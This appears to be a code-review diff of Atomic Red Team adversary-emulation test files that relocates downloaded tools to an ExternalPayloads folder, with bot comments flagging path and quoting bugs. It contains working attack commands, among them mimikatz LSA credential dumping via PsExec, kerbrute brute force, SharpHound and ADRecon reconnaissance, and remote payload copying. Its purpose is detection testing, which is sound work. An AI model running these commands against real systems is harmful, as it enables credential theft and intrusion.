PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "#{psexec_path}" -Force executor: command: | #{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index 8dd2bb78..d782a48b 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml @@ -15,7 +15,7 @@ atomic_tests: script_path: description: Script path. type: path - default: $env:TEMP\T1059.003_script.bat + default: PathToAtomicsFolder\..\ExternalPayloads\T1059.003_script.bat dependency_executor_name: powershell dependencies: - description: | 
@@ -83,7 +83,7 @@ atomic_tests: file_to_print: description: File to be opened/printed by Wordpad. type: string - default: $env:temp\T1059_003note.txt + default: PathToAtomicsFolder\..\ExternalPayloads\T1059_003note.txt max_to_print: description: The maximum number of Wordpad windows the test will open/print. type: integer diff --git a/atomics/T1069.001/T1069.001.yaml b/atomics/T1069.001/T1069.001.yaml index 1e77608a..7dfffa82 100644 --- a/atomics/T1069.001/T1069.001.yaml +++ b/atomics/T1069.001/T1069.001.yaml @@ -55,7 +55,7 @@ atomic_tests: sharphound_path: description: SharpHound Windows executable type: path - default: '$env:TEMP\SharpHound.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\SharpHound.exe' output_path: description: Output for SharpHound type: path @@ -68,6 +68,7 @@ atomic_tests: prereq_command: | if (Test-Path "#{sharphound_path}") { exit 0 } else { exit 1 } get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true" -OutFile "#{sharphound_path}" executor: name: powershell diff --git a/atomics/T1070.006/T1070.006.yaml b/atomics/T1070.006/T1070.006.yaml index 07a98506..652f5ae8 100644 --- a/atomics/T1070.006/T1070.006.yaml +++ b/atomics/T1070.006/T1070.006.yaml @@ -123,7 +123,7 @@ atomic_tests: file_path: description: Path of file to change creation timestamp type: path - default: $env:TEMP\T1551.006_timestomp.txt + default: PathToAtomicsFolder\..\ExternalPayloads\T1551.006_timestomp.txt dependency_executor_name: powershell dependencies: - description: | 
@@ -152,7 +152,7 @@ atomic_tests: file_path: description: Path of file to change modified timestamp type: path - default: $env:TEMP\T1551.006_timestomp.txt + default: PathToAtomicsFolder\..\ExternalPayloads\T1551.006_timestomp.txt dependency_executor_name: powershell dependencies: - description: | @@ -181,7 +181,7 @@ atomic_tests: file_path: description: Path of file to change last access timestamp type: path - default: $env:TEMP\T1551.006_timestomp.txt + default: PathToAtomicsFolder\..\ExternalPayloads\T1551.006_timestomp.txt dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1071.001/T1071.001.yaml b/atomics/T1071.001/T1071.001.yaml index e7088bae..0320c63e 100644 --- a/atomics/T1071.001/T1071.001.yaml +++ b/atomics/T1071.001/T1071.001.yaml @@ -47,11 +47,12 @@ atomic_tests: prereq_command: | if (Test-Path #{curl_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip - Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl - Copy-Item $env:temp\curl\curl-7.71.1-win32-mingw\bin\curl.exe #{curl_path} - Remove-Item $env:temp\curl - Remove-Item $env:temp\curl.zip + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip + Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\curl.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\curl + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.71.1-win32-mingw\bin\curl.exe #{curl_path} + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl.zip executor: command: | #{curl_path} -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1 
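Review bot: In the T1071.001 hunk, `Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl` targets the directory just expanded, and without `-Recurse` Remove-Item prompts for confirmation on a non-empty directory, which stalls a non-interactive prerequisite run; it should be `Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl -Recurse -Force`. The behaviour was the same with the old `$env:temp` path, but the line is rewritten here so it is worth fixing in the same change.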
diff --git a/atomics/T1072/T1072.yaml b/atomics/T1072/T1072.yaml index 1adc6edc..94e84ce0 100644 --- a/atomics/T1072/T1072.yaml +++ b/atomics/T1072/T1072.yaml @@ -24,9 +24,10 @@ atomic_tests: if (Test-Path "${env:ProgramFiles(x86)}/#{radmin_exe}") {exit 0} else {exit 1} get_prereq_command: | Write-Host Downloading radmin installer - (New-Object Net.WebClient).DownloadFile("https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi","$ENV:Temp\#{radmin_installer}") + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}" Write-Host Install Radmin - Start-Process msiexec -Wait -ArgumentList /i , $ENV:Temp\#{radmin_installer}, /qn + Start-Process msiexec -Wait -ArgumentList /i , "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}", /qn executor: name: command_prompt elevation_required: true @@ -56,9 +57,10 @@ atomic_tests: if (Test-Path "${env:ProgramFiles(x86)}/#{PDQ_Deploy_exe}") {exit 0} else {exit 1} get_prereq_command: | Write-Host Downloading PDQ Deploy installer - (New-Object Net.WebClient).DownloadFile("https://download.pdq.com/release/19/Deploy_19.3.350.0.exe","$ENV:Temp\#{PDQ_Deploy_installer}") + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.pdq.com/release/19/Deploy_19.3.350.0.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}" Write-Host Install PDQ Deploy - Start-Process $ENV:Temp\#{PDQ_Deploy_installer} -Wait -ArgumentList "/s" + Start-Process "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}" -Wait -ArgumentList "/s" executor: name: command_prompt elevation_required: true diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index b74238f3..fb6d280c 100644 --- a/atomics/T1082/T1082.yaml 
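Review bot: Beyond the path move, the Radmin hunk replaces `(New-Object Net.WebClient).DownloadFile(...)` with `Invoke-WebRequest ... -OutFile`, a change of download mechanism that the commit message ("use ExternalPayloads directory") does not mention and that deserves a sentence in the PR description. If parity with the other hunks is the intent, T1055 and T1003.002 pass `-UseBasicParsing` to Invoke-WebRequest while this one does not; under Windows PowerShell 5.x that switch avoids the Internet Explorer engine dependency, so adding it keeps the downloads uniform. The PDQ Deploy hunk (@@ -56) below makes the same mechanism change.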
+++ b/atomics/T1082/T1082.yaml @@ -304,11 +304,12 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - The SkyArk AzureStealth module must exist in $env:temp. + The SkyArk AzureStealth module must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | - if (test-path $env:temp\AzureStealth.ps1){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "$env:temp\AzureStealth.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1" - description: | The AzureAD module must be installed. prereq_command: | @@ -323,7 +324,7 @@ atomic_tests: Install-Module -Name Az -Force executor: command: | - Import-Module $env:temp\AzureStealth.ps1 -force + Import-Module PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1 -force $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password Connect-AzAccount -Credential $Credential diff --git a/atomics/T1083/T1083.yaml b/atomics/T1083/T1083.yaml index b36f4540..92dfa5fc 100644 --- a/atomics/T1083/T1083.yaml +++ b/atomics/T1083/T1083.yaml @@ -129,7 +129,7 @@ atomic_tests: dirlister_path: description: 'Path to the DirLister executable ' type: string - default: PathToAtomicsFolder\T1083\bin\DirLister.exe + default: PathToAtomicsFolder..\ExternalPayloads\DirLister.exe dependency_executor_name: powershell dependencies: - description: | 
@@ -138,11 +138,11 @@ atomic_tests: if (Test-Path #{dirlister_path}) {exit 0} else {exit 1} get_prereq_command: | $parentpath = Split-Path "#{dirlister_path}" - Invoke-WebRequest https://github.com/SanderSade/DirLister/releases/download/v2.beta4/DirLister.v2.beta4.zip -OutFile $env:TEMP\TDirLister.v2.beta4.zip New-Item -ItemType Directory -Force -Path $parentpath | Out-Null - Expand-Archive -Path $env:TEMP\TDirLister.v2.beta4.zip -DestinationPath $env:TEMP\TDirLister.v2.beta4 -Force - Copy-Item $env:TEMP\TDirLister.v2.beta4\* $parentpath -Recurse - Remove-Item $env:TEMP\TDirLister.v2.beta4.zip,$env:TEMP\TDirLister.v2.beta4 -Recurse -ErrorAction Ignore + Invoke-WebRequest https://github.com/SanderSade/DirLister/releases/download/v2.beta4/DirLister.v2.beta4.zip -OutFile PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip + Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4 -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4\* $parentpath -Recurse + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip,PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4 -Recurse -ErrorAction Ignore executor: command: | Start-Process #{dirlister_path} diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index 72fb67e3..0f4f6225 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml @@ -51,7 +51,7 @@ atomic_tests: adrecon_path: description: Path of ADRecon.ps1 file type: path - default: $env:TEMP\ADRecon.ps1 + default: PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1 dependency_executor_name: powershell dependencies: - description: | 
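Review bot: In the T1083 hunk, the only directory creation is `New-Item -ItemType Directory -Force -Path $parentpath`, where `$parentpath` comes from `Split-Path "#{dirlister_path}"`; with the @@ -129 default that parent is derived from the mistyped `PathToAtomicsFolder..\ExternalPayloads`, while the Invoke-WebRequest and Expand-Archive on the following lines write to `PathToAtomicsFolder\..\ExternalPayloads\`, a directory nothing here ensures exists. Add the guard the other hunks use, `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null`, before the Invoke-WebRequest, so the download does not depend on the parameter default being spelled the same way.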
@@ -59,13 +59,13 @@ atomic_tests: prereq_command: | if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile #{adrecon_path} executor: command: | Invoke-Expression #{adrecon_path} cleanup_command: | - Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null - Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse + Get-ChildItem PathToAtomicsFolder\..\ExternalPayloads -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse name: powershell - name: Adfind -Listing password policy auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600 
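Review bot: The cleanup now only sweeps `ADRecon-Report-*` out of ExternalPayloads, but nothing in the executor sets the working directory there, so this is only correct if ADRecon writes its report next to the script rather than into the current directory — worth confirming against the pinned ADRecon.ps1, since the old `$env:TEMP` sweep carried the same assumption. Separately, `Invoke-Expression #{adrecon_path}` with the relocated default breaks as soon as the substituted path contains a space, because Invoke-Expression parses the text as a PowerShell command line; the call operator, `& "#{adrecon_path}"`, avoids that. Dropping `Remove-Item #{adrecon_path}` means the script now intentionally persists in ExternalPayloads; a one-line comment saying so would stop the next reader from re-adding it.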
@@ -297,21 +297,21 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - kerbrute.exe must exist in $env:temp. + kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | - if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:TEMP\kerbrute.exe" + invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe" - description: | - username text file must exist in $env:temp. + username text file must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | - if (test-path $env:temp\username.txt){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\username.txt){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true" -outfile "$env:TEMP\username.txt" + invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\username.txt" executor: command: |- - cd $env:temp - .\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} $env:TEMP\username.txt + cd PathToAtomicsFolder\..\ExternalPayloads + .\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} PathToAtomicsFolder\..\ExternalPayloads\username.txt name: powershell - name: Wevtutil - Discover NTLM Users Remote auto_generated_guid: b8a563d4-a836-4993-a74e-0a19b8481bfe diff --git a/atomics/T1090.003/T1090.003.yaml b/atomics/T1090.003/T1090.003.yaml index 57b7c5fe..76f7f2dc 100644 --- a/atomics/T1090.003/T1090.003.yaml +++ b/atomics/T1090.003/T1090.003.yaml 
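Review bot: Unlike the kerbrute prereqs updated in T1110.001, T1110.003 and T1110.004 in this same patch, this get_prereq_command never creates the ExternalPayloads directory before `invoke-webrequest ... -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"`, so on a checkout where no other test has run first the download fails with a path-not-found error and the prereq keeps failing. Add the same guard ahead of the first download: `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null`. The second dependency (username.txt) has the same gap but is covered once the first one creates the folder.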
@@ -54,7 +54,7 @@ atomic_tests: TorExe: description: Location of tor.exe file. type: string - default: $env:temp\tor\Tor\tor.exe + default: PathToAtomicsFolder\..\ExternalPayloads\tor\Tor\tor.exe dependency_executor_name: powershell dependencies: - description: | @@ -62,8 +62,9 @@ atomic_tests: prereq_command: | if (Test-Path #{TorExe}) {exit 0} else {exit 1} get_prereq_command: | - Start-BitsTransfer -Source "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -Destination "$env:temp\tor.zip" -dynamic - expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" + expand-archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\tor" executor: command: | invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}' diff --git a/atomics/T1095/T1095.yaml b/atomics/T1095/T1095.yaml index a6175bb0..c00390a6 100644 --- a/atomics/T1095/T1095.yaml +++ b/atomics/T1095/T1095.yaml @@ -34,11 +34,11 @@ atomic_tests: ncat_exe: description: The location of ncat.exe type: path - default: $env:TEMP\T1095\nmap-7.80\ncat.exe + default: PathToAtomicsFolder\..\ExternalPayloads\T1095\nmap-7.80\ncat.exe ncat_path: description: The folder path of ncat.exe type: path - default: $env:TEMP\T1095 + default: PathToAtomicsFolder\..\ExternalPayloads\T1095 server_ip: description: The IP address or domain name of the listening server type: string diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index b216f426..8021e38b 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml 
@@ -321,7 +321,7 @@ atomic_tests: - description: 'Must have a Windows Defender version with MpCmdRun.exe installed' prereq_command: | cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*" - MpCmdRun.exe /? + MpCmdRun.exe /? >nul 2>&1 get_prereq_command: Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually" executor: command: | @@ -460,11 +460,11 @@ atomic_tests: prereq_command: | if (Test-Path #{curl_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip - Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl - Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe - Remove-Item $env:temp\curl - Remove-Item $env:temp\curl.zip + Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip + Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\curl.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\curl + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl.zip executor: command: | #{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll 
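Review bot: The curl prereq writes `-Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip` without first creating ExternalPayloads, which most other prereqs in this patch do with a `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null` line; add it before the Invoke-WebRequest. `Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl` targets an extracted directory without `-Recurse`, so PowerShell prompts for confirmation instead of cleaning up; use `Remove-Item ... -Recurse -Force`. The relocation does not change that the step still copies the downloaded binary over `C:\Windows\System32\Curl.exe`, shadowing the inbox curl on current Windows builds; a caveat in the dependency description that this modifies System32 (and whether the test's cleanup restores it) would help operators.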
@@ -505,11 +505,11 @@ atomic_tests: prereq_command: | if (Test-Path #{curl_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip - Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl - Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe - Remove-Item $env:temp\curl - Remove-Item $env:temp\curl.zip + Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip + Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\curl.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\curl + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl.zip - description: | A file must be created to upload prereq_command: | 
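Review bot: The URL on the rewritten Invoke-WebRequest line is wrapped in Unicode curly quotes (`“https://curl.se/...”`) rather than ASCII ones; PowerShell happens to accept them as string delimiters, but they only survived from the old line by accident and break the moment the command is pasted into a shell or editor that normalizes them. Replace them with plain `"..."` to match the identically structured prereq in the previous hunk. As there, the ExternalPayloads directory is not created before the download and `Remove-Item ...\curl` lacks `-Recurse`.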
@@ -589,17 +589,17 @@ atomic_tests: get_prereq_command: | write-host "The binary_file input parameter must be set to a binary that exists on this computer." - description: | - Machine list must exist at specified location ("$env:temp\T1105MachineList.txt") + Machine list must exist at specified location ("PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") prereq_command: | - if (Test-Path "$env:temp\T1105MachineList.txt") {exit 0} else {exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1} get_prereq_command: | - new-item -path "$env:temp\T1105MachineList.txt" - echo "A machine list file has been generated at "$env:temp\T1105MachineList.txt". Please enter the machines to target there, one machine per line." + new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null + echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line." executor: command: | - $machine_list = "$env:temp\T1105MachineList.txt" - $offline_list = "$env:temp\T1105OfflineHosts.txt" - $completed_list = "$env:temp\T1105CompletedHosts.txt" + $machine_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" + $offline_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" + $completed_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" foreach ($machine in get-content -path "$machine_list") {if (test-connection -Count 1 -computername $machine -quiet) {cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" 
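Review bot: The rewritten `echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter ..."` nests unescaped double quotes, so the first string ends after `at ` and the path becomes an adjacent bare token that PowerShell should reject as an unexpected token (the old `$env:temp` version had the same shape, so this line likely never ran cleanly). Use a single-quoted string instead: `echo 'A machine list file has been generated at PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt. Please enter the machines to target there, one machine per line.'` — the placeholder is substituted before PowerShell sees the text, so single quotes are fine. The executor's foreach body continues past the end of the hunk.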
@@ -608,12 +608,12 @@ atomic_tests: else {echo $machine >> "$offline_list"}} cleanup_command: | - if (test-path "$env:temp\T1105CompletedHosts.txt") - {foreach ($machine in get-content -path "$env:temp\T1105CompletedHosts.txt") + if (test-path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt") + {foreach ($machine in get-content -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt") {wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}} - Remove-Item -path "$env:temp\T1105OfflineHosts.txt" -erroraction silentlycontinue - Remove-item -path "$env:temp\T1105CompletedHosts.txt" -erroraction silentlycontinue + Remove-Item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue + Remove-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue name: powershell - name: Printer Migration Command-Line Tool UNC share folder into a zip file @@ -777,7 +777,7 @@ atomic_tests: local_nimgrab: description: Local path to nimgrab type: path - default: $env:TEMP\nimgrab.exe + default: PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe executor: command: | cmd /c nimgrab.exe #{remote_file} #{destination_path} 
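Review bot: Moving `local_nimgrab` to ExternalPayloads does not help the executor line under it, which runs bare `cmd /c nimgrab.exe #{remote_file} #{destination_path}` and therefore only finds the binary if the working directory or PATH happens to contain it; nothing in the hunk sets either. Invoke the downloaded path explicitly: `cmd /c "#{local_nimgrab}" #{remote_file} #{destination_path}`. The executor command may continue beyond the hunk.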
@@ -791,11 +791,11 @@ atomic_tests: prereq_command: | if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip - Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim -Force - Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab} - Remove-Item $env:temp\nim - Remove-Item $env:temp\nim.zip + Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\nim.zip + Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\nim.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\nim -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab} + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim.zip - name: iwr or Invoke Web-Request download auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279 description: | diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index 794600d5..8472bfa9 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml 
@@ -135,22 +135,23 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - kerbrute.exe must exist in $env:temp + kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads prereq_command: | - if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe" - description: | - bruteuser.txt must exist in $env:temp + bruteuser.txt must exist in PathToAtomicsFolder\..\ExternalPayloads prereq_command: | - if (test-path $env:temp\bruteuser.txt){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "$env:temp\bruteuser.txt" + invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt" executor: name: powershell elevation_required: false command: | - cd $env:temp + cd PathToAtomicsFolder\..\ExternalPayloads .\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1 - name: SUDO Brute Force - Debian diff --git a/atomics/T1110.002/T1110.002.yaml b/atomics/T1110.002/T1110.002.yaml index 68a39ce0..dc4d3bba 100644 --- a/atomics/T1110.002/T1110.002.yaml +++ b/atomics/T1110.002/T1110.002.yaml 
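Review bot: The executor's unchanged last line still reads the wordlist from `$env:temp\bruteuser.txt`, while the prereq directly above it now downloads to `PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt`, so after this patch the test fails with a missing-file error unless a stale copy happens to be left in %TEMP%. Update it to match the sibling kerbrute tests changed in T1110.003 and T1110.004: `.\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt TestUser1`.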
@@ -10,7 +10,7 @@ atomic_tests:
hashcat_exe:
description: Path to Hashcat executable
type: string
- default: '%temp%\hashcat6\hashcat-6.1.1\hashcat.exe'
+ default: 'PathToAtomicsFolder\..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe'
input_file_sam:
description: Path to SAM file
type: string
